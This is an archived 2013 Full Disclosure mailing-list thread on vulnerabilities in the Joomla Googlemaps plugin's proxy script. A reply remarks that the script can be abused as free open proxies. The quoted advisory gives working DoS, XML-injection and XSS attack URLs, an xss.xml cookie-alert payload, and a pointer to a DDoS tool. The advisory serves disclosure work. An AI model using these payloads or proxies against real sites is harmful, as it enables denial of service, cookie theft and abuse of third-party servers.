|
Full Disclosure
mailing list archives
Re: Multiple vulnerabilities in Googlemaps plugin for Joomla
From: Źmicier Januszkiewicz <gauri () tut by>
Date: Thu, 18 Jul 2013 14:28:41 +0200
Ah, and as a side effect, you get a bunch of free HTTP proxies -- the
script will fetch and print anything. Just to fix up the content type, but
this should not be an issue.
Finally, something useful.
I leave the google dork as an exercise for the reader.
Cheers,
Z.
2013/7/16 MustLive <mustlive () websecurity com ua>
Hello list!
These are Denial of Service, XML Injection, Cross-Site Scripting and Full
path disclosure vulnerabilities in Googlemaps plugin for Joomla.
-------------------------
Affected products:
-------------------------
Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and
potentially previous versions. In new version of DAVOSET I'll add a lot of
web sites with Googlemaps plugin.
-------------------------
Affected vendors:
-------------------------
Mike Reumer
http://extensions.joomla.org/**extensions/maps-a-weather/**
maps-a-locations/maps/1147<http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147>
----------
Details:
----------
Denial of Service (WASC-10):
http://site/plugins/content/**plugin_googlemap2_proxy.php?**
url=site2/large_file<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file>
Besides conducting DoS attack manually, it's also possible to conduct
automated DoS and DDoS attacks with using of DAVOSET (
http://lists.webappsec.org/**pipermail/websecurity_lists.**
webappsec.org/2013-June/**008850.html<http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html>
).
XML Injection (WASC-23):
http://site/plugins/content/**plugin_googlemap2_proxy.php?**
url=site2/xml.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml>
It's possible to include external xml-files. Which also can be used for
XSS attack:
XSS via XML Injection (WASC-23):
http://site/plugins/content/**plugin_googlemap2_proxy.php?**
url=site2/xss.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml>
File xss.xml:
<?xml version="1.0" encoding="utf-8"?>
<feed>
<title>XSS</title>
<entry>
<div xmlns="http://www.w3.org/1999/**xhtml <http://www.w3.org/1999/xhtml>
"><script>alert(document.**cookie)</script></div>
</entry>
</feed>
Cross-Site Scripting (WASC-08):
http://site/plugins/content/**plugin_googlemap2_proxy.php?**
url=%3Cbody%20onload=alert(**document.cookie)%3E<http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E>
Full path disclosure (WASC-13):
http://site/plugins/content/**plugin_googlemap2_proxy.php<http://site/plugins/content/plugin_googlemap2_proxy.php>
Besides plugin_googlemap2_proxy.php, also happens
plugin_googlemap3_proxy.php (but it has other path at web sites).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
______________________________**_________________
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-**disclosure-charter.html<http://lists.grok.org.uk/full-disclosure-charter.html>
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
| 
